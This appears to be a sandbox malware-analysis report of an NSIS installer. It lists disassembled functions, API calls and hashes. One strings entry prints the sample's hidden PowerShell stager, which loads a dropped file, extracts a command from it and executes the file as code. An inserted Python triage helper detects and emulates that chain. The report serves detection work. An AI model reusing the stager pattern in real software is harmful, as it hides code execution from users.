                                      • Instruction ID: e7c54df8ad39b376662a796d960b289492e5a6982c1727c2c37b81bede79f7f2
                                      • Opcode Fuzzy Hash: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
                                      • Instruction Fuzzy Hash: 43025EB0A00209AFEF109F54DC85AAE7BB5FB84315F10817AF611B62E1D7789E42DF58
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 0040436B
                                      • SetWindowTextA.USER32(00000000,?), ref: 00404395
                                      • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404446
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404451
                                      • lstrcmpiA.KERNEL32(: Completed,Concrescences Setup: Completed), ref: 00404483
                                      • lstrcatA.KERNEL32(?,: Completed), ref: 0040448F
                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A1
                                        • Part of subcall function 004054D3: GetDlgItemTextA.USER32(?,?,00000400,004044D8), ref: 004054E6
                                        • Part of subcall function 00405F64: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FBC
                                        • Part of subcall function 00405F64: CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
                                        • Part of subcall function 00405F64: CharNextA.USER32(?,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FCE
                                        • Part of subcall function 00405F64: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FDE
                                      • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040455F
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457A
                                        • Part of subcall function 004046D3: lstrlenA.KERNEL32(Concrescences Setup: Completed,Concrescences Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
                                        • Part of subcall function 004046D3: wsprintfA.USER32 ref: 00404779
                                        • Part of subcall function 004046D3: SetDlgItemTextA.USER32(?,Concrescences Setup: Completed), ref: 0040478C
                                      Strings
                                      • A, xrefs: 0040443F
                                      • : Completed, xrefs: 0040447D, 00404482, 0040448D
                                      • Concrescences Setup: Completed, xrefs: 00404419, 0040447C
                                      • "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", xrefs: 00404335
                                      • C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 0040446C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$: Completed$A$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$Concrescences Setup: Completed
                                      • API String ID: 2624150263-4182621402
                                      • Opcode ID: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
                                      • Instruction ID: 222947b4accbc62cc0073c5541b0f9589876626f1104fcc3d8441c992cea6716
                                      • Opcode Fuzzy Hash: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
                                      • Instruction Fuzzy Hash: 71A17EB1900209ABDB11AFA5CC45BEFB6B8EF84315F14843BF711B62D1D77C8A418B69
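The Strings entry above records what the installer stub's directory-page handler (the SHBrowseForFolderA / "Concrescences Setup: Completed" dialog code) ends up launching: a hidden PowerShell whose three chained statements read the dropped file Ruralt.Tea into a variable, slice a 3-character substring out of it at offset 69838, and dot-source that substring as a command with the whole file content as its argument. The verb is therefore not visible in the command line at all; it lives inside the dropped file, and the variable names are random, so a detection has to key on the structure of the chain rather than on any literal. The following triage helper is an added example written for this page, not Joe Sandbox output or GuLoader code: `parse_stager` recognises the chain and extracts the path, offset and length, and `resolve_verb` emulates the SubString call against a file image. Ruralt.Tea itself is not on this page, so `SAMPLE_FILE_IMAGE` is constructed filler with the Invoke-Expression alias `iex` placed at the sliced offset purely as an assumption for illustration; the single-byte decoding and the one-line-file behaviour of Get-Content are likewise stated assumptions.

```python
"""Triage helper for the PowerShell stager command line recorded in this report.

Added example, not Joe Sandbox output.  It (1) recognises the three-statement
chain  $a=Get-Content '<file>'; $b=$a.SubString(<off>,<len>); .$b($a)  and pulls
out the file path and slice parameters, and (2) emulates the slice against a
file image so an analyst can see which command the stager will dot-source.
"""
import re
from typing import Optional

# Launch string exactly as it appears in the function's Strings section above.
SAMPLE_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content '
    "'C:\\Users\\user~1\\AppData\\Local\\Temp\\Servicebureauet\\aloe\\Ruralt.Tea';"
    "$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);"
    '.$Advokatfuldmgtigs($Mitokoromono)"'
)

# Constructed stand-in for Ruralt.Tea (the real file is not on this page):
# 70,000 bytes of filler with the Invoke-Expression alias "iex" placed at the
# offset the command line slices.  Assumption for illustration only.
_img = bytearray(b"#" * 70000)
_img[69838:69841] = b"iex"
SAMPLE_FILE_IMAGE = bytes(_img)

# Variable names are arbitrary (the loader randomises them), so match structure,
# not names: the verb variable must be a slice of the content variable, and the
# content variable must be passed back into the sliced verb via "." or "&".
_STAGER_RE = re.compile(
    r"\$(?P<content>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<verb>\w+)\s*=\s*\$(?P=content)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;\s*"
    r"[.&]\s*\$(?P=verb)\s*\(\s*\$(?P=content)\s*\)",
    re.IGNORECASE,
)
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def parse_stager(cmdline: str) -> Optional[dict]:
    """Return the stager parameters, or None when the chain is not present."""
    m = _STAGER_RE.search(cmdline)
    if m is None:
        return None
    return {
        "hidden_window": _HIDDEN_RE.search(cmdline) is not None,
        "path": m.group("path"),
        "content_var": m.group("content"),
        "verb_var": m.group("verb"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
    }


def resolve_verb(file_image: bytes, offset: int, length: int) -> Optional[str]:
    """Emulate `$content.SubString(offset, length)`.

    Get-Content on a one-line file yields a single string, which is what makes
    the .SubString call work; the image is decoded as single-byte text, so a BOM
    or multi-byte characters would shift the offset (assumption, see lead-in).
    Returns None when the file is shorter than offset+length: PowerShell would
    throw ArgumentOutOfRangeException and the stager would abort before running.
    """
    text = file_image.decode("latin-1").rstrip("\r\n")
    if offset + length > len(text):
        return None
    return text[offset:offset + length]


def triage(cmdline: str, file_image: bytes) -> dict:
    """Combine both steps into a verdict an analyst can act on."""
    params = parse_stager(cmdline)
    if params is None:
        return {"matched": False}
    verb = resolve_verb(file_image, params["offset"], params["length"])
    return {
        "matched": True,
        "verb": verb,
        # "iex" is the built-in alias of Invoke-Expression; extend the set if
        # other short invocation aliases turn up in a dropped file.
        "invokes_file_as_code": verb is not None and verb.lower() in {"iex"},
        **params,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE, SAMPLE_FILE_IMAGE))
```

For hunting, the structural match is the reusable part: a process-creation event for powershell.exe whose command line contains `Get-Content`, `.SubString(` and a `.$` or `&$` invocation of the sliced variable is this chain regardless of the variable names, and `-windowstyle hidden` raises the score further. The offset and length the parser returns tell the analyst exactly which bytes of the dropped file to inspect; if the sandbox's dropped-files list does not include that file, `resolve_verb` cannot be run and the verb stays unknown rather than being guessed.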
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: a8d2051a0b43e45e0548476364d3f5ec7a3e7dc7c9238cb7b637b6be69fa9f30
                                      • Instruction ID: a95b2630499809d01a6e7b037cab792d100f7a465f9f887e4e98b5ff960ae470
                                      • Opcode Fuzzy Hash: a8d2051a0b43e45e0548476364d3f5ec7a3e7dc7c9238cb7b637b6be69fa9f30
                                      • Instruction Fuzzy Hash: 79F0A7726082009BE701E7A49949AEE7778DB61314F60057BE241A21C1D7B84985AB3A
                                      APIs
                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B2
                                      • GetDlgItem.USER32(00000000,000003E8), ref: 004040C6
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040E4
                                      • GetSysColor.USER32(?), ref: 004040F5
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404104
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404113
                                      • lstrlenA.KERNEL32(?), ref: 00404116
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404125
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413A
                                      • GetDlgItem.USER32(?,0000040A), ref: 0040419C
                                      • SendMessageA.USER32(00000000), ref: 0040419F
                                      • GetDlgItem.USER32(?,000003E8), ref: 004041CA
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420A
                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404219
                                      • SetCursor.USER32(00000000), ref: 00404222
                                      • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404235
                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404242
                                      • SetCursor.USER32(00000000), ref: 00404245
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404271
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404285
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: : Completed$N$open
                                      • API String ID: 3615053054-3069340868
                                      • Opcode ID: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
                                      • Instruction ID: f5dd8c80699fee66c1c508087d6ededbe7bbcdfb93c9c5870bdb982cd402330a
                                      • Opcode Fuzzy Hash: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
                                      • Instruction Fuzzy Hash: 1261C5B1A40209BFEB109F61DC45F6A7B79FB84741F10807AFB057A2D1C7B8A951CB98
                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
                                      • Instruction ID: a0b7ce50fec83efafeb16569406a1c152c04985fcf8b97c7298fc3655e55bd79
                                      • Opcode Fuzzy Hash: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
                                      • Instruction Fuzzy Hash: CD419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                      APIs
                                      • lstrcpyA.KERNEL32(00421A98,NUL,?,00000000,?,00000000,00405BD5,?,?), ref: 00405A51
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BD5,?,?), ref: 00405A75
                                      • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405A7E
                                        • Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
                                        • Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913
                                      • GetShortPathNameA.KERNEL32(00421E98,00421E98,00000400), ref: 00405A9B
                                      • wsprintfA.USER32 ref: 00405AB9
                                      • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405AF4
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B03
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3B
                                      • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B91
                                      • GlobalFree.KERNEL32(00000000), ref: 00405BA2
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BA9
                                        • Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00405970
                                        • Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                      • String ID: %s=%s$NUL$[Rename]
                                      • API String ID: 222337774-4148678300
                                      • Opcode ID: 29faa2ef249efea023fcf9d7dc18c5a7494662307f22d41ae8b698d121cf93b2
                                      • Instruction ID: 42b7cc2c3f2f4ef7c3412fd2f3d3cbe4eee66c4c235e50fd6e5efd85f9217fc4
                                      • Opcode Fuzzy Hash: 29faa2ef249efea023fcf9d7dc18c5a7494662307f22d41ae8b698d121cf93b2
                                      • Instruction Fuzzy Hash: 9931E271A04B19ABD2206B619C89F6B3A6CDF45755F14003AFE05F62D2DA7CBC008E6D
                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FBC
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FCE
                                      • CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FDE
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F65
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 00405FA0
                                      • *?|<>/":, xrefs: 00405FAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                      • API String ID: 589700163-2454393318
                                      • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                      • Instruction ID: a0964663e3c08fb0288e5f4f4a0160773f2bbbf5a4d40b443b4f636863f092b1
                                      • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                      • Instruction Fuzzy Hash: C611C451808F922EEB3216640C44BBB7F99CF5A760F18007BE9D4B22C2D67C5C429F6E
                                      APIs
                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F62
                                      • GetSysColor.USER32(00000000), ref: 00403F7E
                                      • SetTextColor.GDI32(?,00000000), ref: 00403F8A
                                      • SetBkMode.GDI32(?,?), ref: 00403F96
                                      • GetSysColor.USER32(?), ref: 00403FA9
                                      • SetBkColor.GDI32(?,?), ref: 00403FB9
                                      • DeleteObject.GDI32(?), ref: 00403FD3
                                      • CreateBrushIndirect.GDI32(?), ref: 00403FDD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                      • Instruction ID: 563dd17f99c902cd34f005863f03740a6a5938172a6e5e033378c94734032825
                                      • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                      • Instruction Fuzzy Hash: B4214271908705ABC7219F68DD48F4BBFF8AF01715B048A29E895E26E0D735EA04CB55
                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047F8
                                      • GetMessagePos.USER32 ref: 00404800
                                      • ScreenToClient.USER32(?,?), ref: 0040481A
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040482C
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                      • Instruction ID: 206dc1e0429e6aa6b627cd25208fa2295557d59b2a7717453fa0c9894da25502
                                      • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                      • Instruction Fuzzy Hash: E6015276D00259BADB01DB94DC45FFEBBBCAF55711F10412BBA10B61C0C7B4A501CBA5
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                      • MulDiv.KERNEL32(0001D200,00000064,00072B90), ref: 00402BC5
                                      • wsprintfA.USER32 ref: 00402BD5
                                      • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402BCF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
                                      • Instruction ID: bd73235a5a2a729140de961e31d76a0e47d27260d0eaef7d75f80e35c4c54abd
                                      • Opcode Fuzzy Hash: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
                                      • Instruction Fuzzy Hash: EF01F471540208BBEF109F60DD49EEE3B79EB04305F008039FA16B51D1D7B59955DF59
                                      APIs
                                      • GetDC.USER32(?), ref: 00401D3B
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                      • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                      • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID: Tahoma
                                      • API String ID: 3808545654-3580928618
                                      • Opcode ID: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
                                      • Instruction ID: 818c9bdddfe1b1fffd76dbb1b88acba4993fd419864b94457e62d7fc32e1ff32
                                      • Opcode Fuzzy Hash: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
                                      • Instruction Fuzzy Hash: FE016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E3C67811569B3F
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                      • GlobalFree.KERNEL32(?), ref: 0040276F
                                      • GlobalFree.KERNEL32(00000000), ref: 00402782
                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: 0f1953924fa823fa64f56edeb7276902427a35836a51b24fa44fe1db59ad754c
                                      • Instruction ID: 55e8cf3ffad71cabca96213aa966ad8f6b0c6824c0bc9dabfeb9c0d6c9f08848
                                      • Opcode Fuzzy Hash: 0f1953924fa823fa64f56edeb7276902427a35836a51b24fa44fe1db59ad754c
                                      • Instruction Fuzzy Hash: 03217C71800124BBCF216FA5DE89EAE7A79EF09324F14023AF950762D1C7795D418FA9
                                      APIs
